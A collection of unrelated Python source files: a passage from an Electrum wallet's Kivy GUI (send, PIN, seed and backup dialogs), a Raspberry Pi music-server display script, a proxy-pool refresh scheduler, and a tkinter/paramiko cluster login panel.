self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum Bitweb')
except ImportError:
self.logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
if amount == '!':
screen.is_max = True
max_amt = self.get_max_amount()
screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
else:
screen.amount = amount
screen.is_max = False
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self):
from .uix.dialogs.fee_dialog import FeeDialog
fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
fee_dialog.open()
def set_fee_status(self):
target, tooltip, dyn = self.electrum_config.get_fee_target()
self.fee_status = target
def on_fee(self, event, *arg):
self.set_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid password")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
# called if old_password works on self.wallet
self.password = new_password
if self._use_single_password:
path = self.wallet.storage.path
self.stop_wallet()
update_password_for_directory(self.electrum_config, old_password, new_password)
self.load_wallet_by_name(path)
msg = _("Password updated successfully")
else:
self.wallet.update_password(old_password, new_password)
msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
self.show_info(msg)
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def pin_code_dialog(self, cb):
if self._use_single_password and self.has_pin_code():
def on_choice(choice):
if choice == 0:
self.change_pin_code(cb)
else:
self.reset_pin_code(cb)
choices = {0:'Change PIN code', 1:'Reset PIN'}
dialog = ChoiceDialog(
_('PIN Code'), choices, 0,
on_choice,
keep_choice_order=True)
dialog.open()
else:
self.change_pin_code(cb)
def reset_pin_code(self, cb):
on_success = lambda x: self._set_new_pin_code(None, cb)
d = PasswordDialog(self,
basename = self.wallet.basename(),
check_password = self.wallet.check_password,
on_success=on_success,
on_failure=lambda: None,
is_change=False,
has_password=self.wallet.has_password())
d.open()
def _set_new_pin_code(self, new_pin, cb):
self.electrum_config.set_key('pin_code', new_pin)
cb()
self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
def change_pin_code(self, cb):
on_failure = lambda: self.show_error(_("PIN not updated"))
on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
backup_dir = self.electrum_config.get_backup_dir()
if backup_dir:
self._save_backup(backup_dir)
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
return
backup_dir = util.android_backup_dir()
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self, backup_dir):
try:
new_path = self.wallet.save_backup(backup_dir)
except Exception as e:
self.logger.exception("Failed to save wallet backup")
self.show_error("Failed to save wallet backup" + '\n' + str(e))
return
self.show_info(_("Backup saved:") + f"\n{new_path}")
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
def lightning_status(self):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
status = _('Enabled')
else:
status = _('Enabled, non-recoverable channels')
else:
if self.wallet.can_have_lightning():
status = _('Not enabled')
else:
status = _("Not available for this wallet.")
return status
def on_lightning_status(self, root):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
pass
else:
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
self.show_info(msg)
elif self.wallet.can_have_lightning():
root.dismiss()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
d = Question(msg, self._enable_lightning, title=_('Enable Lightning?'))
d.open()
def _enable_lightning(self, b):
if not b:
return
self.wallet.init_lightning(password=self.password)
self.show_info(_('Lightning keys have been initialized.'))
|
sb.py
|
#!/usr/bin/python3
from LMSTools import LMSServer, LMSPlayer, LMSTags as tags
from time import sleep
import requests
import textwrap
import re
#import numpy as np
from datetime import datetime
from evdev import InputDevice, categorize, ecodes
from threading import Thread
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
############## CHANGE ME! ###################
SERVER = '192.168.68.121' # ip address of Logitech Media Server
PORT = '9000'
PLAYER = 'RME Coax'
###### I/O devices may be different on your setup #####
###### can optionally use numpy to write to fb ########
#h, w, c = 320, 480, 4
#fb = np.memmap('/dev/fb0', dtype='uint8',mode='w+',shape=(h,w,c))
fbw, fbh = 480, 320 # framebuffer dimensions
fb = open("/dev/fb0", "wb") # framebuffer device
###### Touchscreen input device ######
dev = InputDevice('/dev/input/event0')
#######################################################
fonts = []
fonts.append( ImageFont.truetype('/usr/share/fonts/truetype/oswald/Oswald-Bold.ttf', 24) )
fonts.append( ImageFont.truetype('/usr/share/fonts/truetype/oswald/Oswald-Light.ttf', 20) )
fonts.append( ImageFont.truetype('/usr/share/fonts/truetype/dejavu/DejaVuSansMono.ttf', 30) )
fonts.append( ImageFont.truetype('/usr/share/fonts/truetype/dejavu/DejaVuSansMono.ttf', 144) )
## Touchscreen event worker thread
def event_thread():
for event in dev.read_loop():
if event.type == ecodes.EV_KEY:
absevent = categorize(event)
if absevent.event.value == 0:
handle_event(dev)
## Red and Blue color channels are reversed from normal RGB on pi framebuffer
def swap_redblue(img):
"Swap red and blue channels in image"
r, g, b, a = img.split()
return Image.merge("RGBA", (b, g, r, a))
## Paint image to screen at position
def blit(img, pos):
size = img.size
w = size[0]
h = size[1]
x = pos[0]
y = pos[1]
### to use numpy, uncomment...
# n = np.array(img)
# n[:,:,[0,1,2]] = n[:,:,[2,1,0]]
# fb[y:y+h,x:x+w] = n
### ... and comment all below
img = swap_redblue(img)
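# seek to the byte offset of pixel (x, y): 4 bytes per pixel, fbw pixels per framebuffer row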
try:
fb.seek(4 * ((pos[1]) * fbw + pos[0]))
except Exception as e:
print("seek error: ", e)
iby = img.tobytes()
for i in range(h):
try:
fb.write(iby[4*i*w:4*(i+1)*w])
fb.seek(4 * (fbw - w), 1)
except Exception as e:
break
## Display date and time when idle
def displaydatetime(force):
if not force:
sec = datetime.now().second
if sec not in {0,15,30,45}:
return
dt = datetime.today().strftime('%a, %d %B %Y')
tm = datetime.today().strftime('%H:%M')
img = Image.new('RGBA',(480, 320))
draw = ImageDraw.Draw(img)
draw.text((20,10), tm, (255,255,255),font=fonts[3])
draw.text((65,200), dt, (255,255,255),font=fonts[2])
blit(img,(0,0))
## Red song progress line
def displayprogress(seek, duration):
if duration > 0:
progress = seek / duration * 480
else:
progress = 0
img = Image.new('RGBA', (480, 6))
draw = ImageDraw.Draw(img)
draw.line((0,0,progress,0),fill='red',width=6)
blit(img,(0,44))
## Display artist, song title, album title
def displaymeta(data):
img = Image.new('RGBA',size=(210,270),color=(0,0,0,255))
tw1 = textwrap.TextWrapper(width=30)
tw2 = textwrap.TextWrapper(width=30)
s = "\n"
artist = data.get('artist', "")
title = data.get('title', "")
album = data.get('album', "")
if album == "":
album = data.get('remote_title', "")
artist = s.join(tw2.wrap(artist)[:6])
album = s.join(tw2.wrap(album)[:6])
draw = ImageDraw.Draw(img)
draw.text((10,0), artist, (191,245,245),font=fonts[1])
draw.text((10,165), album, (255,255,255),font=fonts[1])
blit(img,(270,50))
img = Image.new('RGBA',size=(480,50),color=(0,0,0,255))
draw = ImageDraw.Draw(img)
draw.text((0,0), title, (255,255,255),font=fonts[0])
blit(img,(0,0))
## Get album cover and display
def getcoverart(url):
try:
img = Image.open(requests.get(url, stream=True).raw)
img = img.resize((270,270))
img = img.convert('RGBA')
blit(img,(0,50))
except Exception as e:
print(e)
pass
## Handle touchscreen events
def handle_event(dev):
global player
x1 = dev.absinfo(ecodes.ABS_X).value
y1 = dev.absinfo(ecodes.ABS_Y).value
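# Map raw touch coordinates to the 480x320 screen; the X/Y axes are swapped for
# this panel, and 3850 is assumed to be the controller's maximum raw value.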
x=int((y1/3850)*480)
y=int((x1/3850)*320)
try:
if x >= 286:
player.next()
print("next")
elif x>143 and x <286:
player.toggle()
print("play/pause")
else:
player.prev()
print("prev")
except Exception as e:
print(e)
pass
nowplaying = ''
old_nowplaying = ''
cover_url = ''
old_url = ''
old_playing = False
seek = 0
duration = 0
progress = 0
playing = False
## Start event handler thread
t = Thread(target=event_thread)
t.start()
## Init the screen
displaydatetime(True)
## Init LMS server and player
server = LMSServer(SERVER)
players = server.get_players()
for p in players:
if p.name == PLAYER:
print(p)
player = p
break
#player = LMSPlayer(PLAYER, server)
nowplaying = ''
old_playing = True
old_nowplaying = ''
cover_url = ''
detail = []
taglist = [tags.ARTIST, tags.COVERID, tags.DURATION, tags.COVERART, tags.ARTWORK_URL, tags.ALBUM, tags.REMOTE_TITLE, tags.ARTWORK_TRACK_ID]
## Main loop - wait for player events, handle them
while True:
try:
playing = (player.mode == "play")
except:
playing = False
if playing:
detail = player.playlist_get_current_detail(amount=1,taglist=taglist)[0]
try:
if 'artwork_url' in detail:
artwork_url = detail['artwork_url']
if not artwork_url.startswith('http'):
if artwork_url.startswith('/'):
artwork_url = artwork_url[1:]
cover_url = 'http://{}:{}/{}'.format(SERVER,PORT,artwork_url)
else:
cover_url = artwork_url
else:
cover_url='http://{}:{}/music/{}/cover.jpg'.format(SERVER,PORT,detail['artwork_track_id'])
except Exception as e:
print(e)
nowplaying = detail['title']
try:
seek = player.time_elapsed
except Exception as e:
seek = 0
try:
duration = player.track_duration
except Exception as e:
duration = 0
if not playing:
displaydatetime(False)
old_playing = playing
detail = []
elif playing and seek > 3:
try:
displayprogress(seek,duration)
except Exception as e:
progress = 0
if playing != old_playing:
old_playing = playing
if playing:
displayprogress(seek,duration)
getcoverart(cover_url)
displaymeta(detail)
else:
displaydatetime(False)
if nowplaying != old_nowplaying or cover_url != old_url:
old_nowplaying = nowplaying
old_url = cover_url
if playing:
getcoverart(cover_url)
displaymeta(detail)
else:
displaydatetime(False)
sleep(1)
|
ProxyRefreshSchedule.py
|
# -*- coding: utf-8 -*-
# !/usr/bin/env python
"""
-------------------------------------------------
File Name: ProxyRefreshSchedule.py
Description :  Scheduled proxy refresh
Author : JHao
date: 2016/12/4
-------------------------------------------------
Change Activity:
2016/12/4: scheduled proxy refresh
2017/03/06: added logging via LogHandler
2017/04/26: proxies that pass validation in raw_proxy_queue but already exist in useful_proxy_queue are no longer re-added
-------------------------------------------------
"""
import sys
import time
import logging
from threading import Thread
from apscheduler.schedulers.background import BackgroundScheduler
from Util.GetConfig import config
sys.path.append('../')
from Util.utilFunction import validUsefulProxy
from Manager.ProxyManager import ProxyManager
from Util.LogHandler import LogHandler
__author__ = 'JHao'
logging.basicConfig()
class ProxyRefreshSchedule(ProxyManager):
"""
Scheduled proxy refresh.
"""
def __init__(self):
ProxyManager.__init__(self)
self.log = LogHandler('refresh_schedule')
def validProxy(self):
"""
Validate the proxies in raw_proxy_queue and put the usable ones into useful_proxy_queue.
:return:
"""
self.db.changeTable(self.raw_proxy_queue)
raw_proxy_item = self.db.pop()
# self.log.info('ProxyRefreshSchedule: [%s] start validating raw_proxy' % time.ctime())
# compute the already known proxies to avoid redundant validation
remaining_proxies = self.getAll()
while raw_proxy_item:
raw_proxy = raw_proxy_item.get('proxy')
if isinstance(raw_proxy, bytes):
# Py3 compatibility: redis returns bytes
raw_proxy = raw_proxy.decode('utf8')
if raw_proxy not in remaining_proxies:
if validUsefulProxy(raw_proxy):
self.db.changeTable(self.useful_proxy_queue)
self.db.put(raw_proxy)
# self.log.info('ProxyRefreshSchedule: %s validation pass' % raw_proxy)
else:
# self.log.info('ProxyRefreshSchedule: raw_proxy validation failed: %s' % raw_proxy)
pass
else:
# self.log.info('ProxyRefreshSchedule: raw_proxy already added: {}'.format(raw_proxy))
pass
self.db.changeTable(self.raw_proxy_queue)
raw_proxy_item = self.db.pop()
remaining_proxies = self.getAll()
# self.log.info('ProxyRefreshSchedule: [%s] finished validating raw_proxy' % time.ctime())
def refreshPool():
pp = ProxyRefreshSchedule()
pp.validProxy()
def batchRefresh(process_num=config.refresh_process_num):
"""
Create the specified number of threads, each running refreshPool.
- Executed as a periodic task.
"""
# validate newly fetched proxies
pl = []
for num in range(process_num):
proc = Thread(target=refreshPool, args=())
pl.append(proc)
for num in range(process_num):
pl[num].daemon = True
pl[num].start()
for num in range(process_num):
pl[num].join()
def fetchAll():
"""
Fetch new proxies according to the configuration file.
- Executed as a periodic task.
"""
p = ProxyRefreshSchedule()
p.db.changeTable(p.useful_proxy_queue)
if config.max_limit == 0 or p.db.getNumber() < config.max_limit:
# fetch new proxies
p.refresh()
else:
p.log.fatal('Valid proxies have reached the configured maximum; pausing fetching')
def run():
scheduler = BackgroundScheduler()
# No need to run too often: the source sites update slowly, and fetching too fast increases validation load and causes raw_proxy to back up
scheduler.add_job(fetchAll, 'interval', seconds=config.fetch_interval, id="fetch_proxy", max_instances=1)
scheduler.add_job(batchRefresh, "interval", seconds=config.refresh_interval, max_instances=1) # check once per minute
scheduler.start()
fetchAll()
while True:
time.sleep(3)
if __name__ == '__main__':
run()
|
login.py
|
from tkinter import *
from pickle import dump, load
from tkinter.ttk import *
from time import sleep
import tkinter.messagebox as tkMessageBox
import threading
import paramiko
import Pmw
import os
from datetime import datetime
class Login:
def __init__(self, parent, parameters, all):
parent.__init__
self.parent = parent
self.allunits = all
self.parameters = parameters
self.parameters['Login']['cluster']= 0
self.sAddress = StringVar()
self.p = self.params()
self.username = StringVar()
self.password = StringVar()
self.checkb = IntVar()
self.server = None
self.abqLicense_on = False
self.licenseThread = None
self.cwd = os.getcwd()
if self.p['checkb']:
self.username.set(self.p['username'])
self.password.set(self.p['password'])
self.checkb.set(self.p['checkb'])
self.sAddress.set(self.p['server'])
self.parameters['Login']['server']=self.p['server']
else:
self.username.set('')
self.password.set('')
self.license = StringVar()
self.license.set('--')
self.LoginFrame = LabelFrame(parent, text='Login')
self.user = Frame(self.LoginFrame, borderwidth=2, relief='groove')
self.user.grid(row=0, column=0, padx=5)
self.labelUsername = Label(self.user, text = 'Username:')
self.labelUsername.grid(row=0, column=0, sticky= 'E')
self.labelPassword = Label(self.user, text = 'Password:')
self.labelPassword.grid(row=1, column=0, sticky='E')
self.entryUser = Entry(self.user, textvariable=self.username)
self.entryUser.grid(row=0, column=1, columnspan=2, sticky='WE')
self.entryPass= Entry(self.user, show='*', textvariable=self.password)
self.entryPass.grid(row=1, column=1, columnspan=2, sticky='WE')
self.cbutton = Checkbutton(self.user, text = "Remember me", variable=self.checkb)
self.cbutton.grid(row=2, column=0, sticky='E')
#lgbutton = Button(self.use, text= self.buttonl.get(), command=self.buttonPress)
self.lgibutton = Button(self.user, text= 'Login', command=self.buttonLogin)
self.lgibutton.grid(row=2, column=1, sticky='W')
self.lgobutton = Button(self.user, text= 'Logout', command=self.buttonLogout, state = 'disabled')
self.lgobutton.grid(row=2, column=2, sticky='E')
self.display = Frame(self.LoginFrame, borderwidth=2, relief='groove')
self.display.grid(row=1, column=0, ipady=12, padx=5, sticky='wens')
self.radio_var = IntVar()
self.radios = []
for radio, i in zip(('Run computations on PC', 'Run computations on cluster'), (0, 1)):
r = Radiobutton(self.display, text=radio, variable=self.radio_var, value=i, command=self.switchmode)
r.grid(row=i, columnspan=2, sticky='w')
self.radios.append(r)
self.radios[1].config(state='disabled')
self.labelLicense = Label(self.display, text = 'ABAQUS license:')
self.labelLicense.grid(row=3, column=0, sticky= 'w', padx=12)
self.showLicense = Label(self.display, text = self.license.get())
self.showLicense.grid(row=3, column=1, sticky= 'w', padx=12)
def pack(self, side='top', fill=None, expand=None, padx=0, pady=0):
self.LoginFrame.pack(side=side, fill=fill, expand=expand, padx=padx, pady=pady)
def switchmode(self):
self.parameters['Login']['cluster']=self.radio_var.get()
def buttonLogin(self):
if 'server' in self.parameters['Login'].keys() and self.parameters['Login']['server']:
self.lgibutton.config(state='disabled')
self.lgobutton.config(state='normal')
try:
server = paramiko.Transport((self.parameters['Login']['server'], 22))
server.connect(username=self.username.get(), password=self.password.get())
self.server = server
if self.checkb.get():
self.p = {'username': self.username.get(), 'password':self.password.get(), 'checkb':self.checkb.get(), 'server':self.sAddress.get()}
f = open('%s/login.txt' % self.cwd, 'wb')
dump(self.p, f)
f.close()
else:
self.p = {'username': '', 'password':'', 'checkb':0, 'server':''}
f = open('%s/login.txt' % self.cwd, 'wb')
dump(self.p, f)
f.close()
self.abqLicense_on=True
self.licenseThread = threading.Thread(target=self.abqLicense)
self.licenseThread.start()
self.radios[1].config(state='normal')
except:
self.lgobutton.config(state='disabled')
self.lgibutton.config(state='normal')
tkMessageBox.showerror(title='Error', message="Login fail! Please check the username and password as well as the setting about the server." )
else:
self.setServer()
def abqLicense(self):
while self.abqLicense_on:
try:
channel = self.server.open_session()
try:
channel.exec_command('cat output')
output = [line.decode('utf-8', 'replace') for line in channel.makefile('rb', -1).readlines()]  # decode bytes so the string comparisons below work on Python 3
if output[1] == 'Viewer licenses:\n':
for i in output:
if 'available.' in i.split():
available = int(i.split()[-4])
if 'issued:' in i.split():
issued = int(i.split()[-1])
total = available+issued
self.showLicense.config(text="%d / %d licenses available" % (available, total))
#self.license.set("%d / %d" % (available, total))
sleep(1)
except:
pass
except:
self.lgobutton.config(state='disabled')
self.lgibutton.config(state='normal')
self.abqLicense_on=False
self.server.close()
self.showLicense.config(text="--")
self.radios[1].config(state='disabled')
self.radio_var.set(0)
if self.allunits['Control'].Optimize.cget('text') != " Start \nOptimization" and self.radio_var.get():
self.allunits['Control'].start()
tkMessageBox.showerror(title='Error', message="The connection with the server has been lost!. The optimization has been stopped automatically. (%s)" % str(datetime.now()))
else:
tkMessageBox.showerror(title='Error', message="The connection with the server has been lost!")
